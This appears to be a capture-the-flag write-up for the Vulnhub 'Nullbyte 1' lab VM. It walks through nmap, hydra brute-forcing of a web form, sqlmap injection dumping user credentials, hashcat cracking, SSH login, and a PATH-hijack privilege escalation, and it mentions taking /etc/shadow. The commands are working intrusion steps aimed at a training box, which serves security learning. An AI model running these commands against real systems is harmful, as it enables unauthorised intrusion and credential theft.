Vulnhub - Nullbyte 1
Scanning and Enumeration
DHCP Server: 10.10.10.1
Attacker-Kali: 10.10.10.2
NullByte: 10.10.10.3
$ nmap -sV 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.00027s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
MAC Address: 08:00:27:29:28:0E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Notable ports:
80 - HTTP Server
777 - SSH Service
111 - rpcbind Service
$ dirb http://10.10.10.3 # dirb maps HTTP server directory by brute force, dirbuster is w/ GUI
# basically just says they use php my admin
Part 1: Site analysis and Steganography
Navigate to http://10.10.10.3:80. There is an interesting image and no other identifying info. Download the picture called main.gif.
$ exiftool main.gif
ExifTool Version Number : 11.84
File Name : main.gif
Directory : .
File Size : 16 kB
File Modification Date/Time : 2015:08:01 12:39:30-04:00
File Access Date/Time : 2020:01:26 16:37:29-05:00
File Inode Change Date/Time : 2020:01:26 16:37:24-05:00
File Permissions : rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071
The comment is interesting: P-): kzMb5nVYJw.
Part 2: Hydra and Form Brute-forcing
After some thinking and trial and error, navigate to http://10.10.10.3/kzMb5nVYJw/. Here we see a form. When we enter a random key into the form at this page, we get “invalid key”. We use this info to formulate a hydra command.
Choose big.txt wordlist, select http-post-form, the address 10.10.10.3, the location of the form “/kzMb5nVYJw/index.php” with our field “key” and the ^PASS^ string (the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^), and the third colon delimited argument that designates failure “invalid key”. -l is for our login name which is empty, -f is for exit when a login/pass pair is found, -V is for verbose
$ hydra -P /usr/share/dirb/wordlists/big.txt 10.10.10.3 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -fV -l ""
$ hydra -P /usr/share/dirb/wordlists/big.txt 10.10.10.3 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -fV -l ""
[DATA] max 16 tasks per 1 server, overall 16 tasks, 20469 login tries (l:1/p:20469), ~1280 tries per task
[DATA] attacking http-post-form://10.10.10.3:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4476.00 tries/min, 4476 tries in 00:01h, 15993 to do in 00:04h, 16 active
[80][http-post-form] host: 10.10.10.3 password: elite
Part 3: SQLMap and Forms
Enter “elite” as the key to progress to the next page, which has a form that prompts for a username. After guessing “, we get an error:
Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%"' at line 1
The full search after an input is: http://10.10.10.3/kzMb5nVYJw/420search.php?usrtosearch=. Knowing this form is hooked up to SQL, we formulate an sqlmap command.
$ sqlmap -u "http://10.10.10.3/kzMb5nVYJw/420search.php?usrtosearch=" -dbs
[18:04:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.5
[18:04:29] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
seth is the most interesting database, all the others seem standard.
$ sqlmap -u "http://10.10.10.3/kzMb5nVYJw/420search.php?usrtosearch=" -D seth -tables
Database: seth
[1 table]
+-------+
| users |
+-------+
$ sqlmap -u "http://10.10.10.3/kzMb5nVYJw/420search.php?usrtosearch=" -D seth -T users -columns
Database: seth
Table: users
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| position | text |
| user | text |
| id | smallint(6) |
| pass | text |
+----------+-------------+
$ sqlmap -u "http://10.10.10.3/kzMb5nVYJw/420search.php?usrtosearch=" -D seth -T users -C id,position,user,pass -dump
[18:07:57] [INFO] fetching entries of column(s) '`position`, `user`, id, pass' for table 'users' in database 'seth'
Database: seth
Table: users
[2 entries]
+----+--------+------------+---------------------------------------------+
| id | user | position | pass |
+----+--------+------------+---------------------------------------------+
| 1 | ramses | <blank> | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |
| 2 | isis | employee | --not allowed-- |
+----+--------+------------+---------------------------------------------+
Part 4: Password Cracking
ramses’ pass looks like base64, so we decode it with built-in command.
$ echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input
We get invalid input because string length is not a multiple of 4, but output appears to be an MD5 hash. I add a “=” to the end of the string to remove invalid input response and pipe output to a file called crack_me, and echo for a new line to standard out
$ $ echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d | tee crack_me && echo
c6d6bd7ebf806f43c76acc3681703b81
This looks like an MD5 hash.
$ hashcat –m 0 crack_me /usr/share/wordlists/rockyou.txt --force
c6d6bd7ebf806f43c76acc3681703b81:omega
Part 5: Gaining Access
Now that we have a username and password, we try to login to the nonstandard ssh port we learned about during scanning.
$ ssh ramses@10.10.10.3 -p 777
//enter password omega
We’re in!
Part 6: Privilege Escalation
$ cat .bash_history
//noticed procwatch get invoked from /var/www/backup
$ cd /var/www/backup
$ ./procwatch
//this ELF uses ps at some point during its execution, so lets make a new ps command in this folder and add it to path
$ export PATH="$(pwd):$PATH"
//create symbolic link and name it ps (I tried /bin/bash first, but it did not elevate privileges)
$ ln -s /bin/sh ps
$ ./procwatch
# whoami
root
//pwned
# cd /root/
# ls
proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----
For fun I also grabbed /etc/passwd and /etc/shadow and unshadowed them on my machine, then used john to try to crack remaining user accounts. I’ll leave that as an exercise to the reader ;)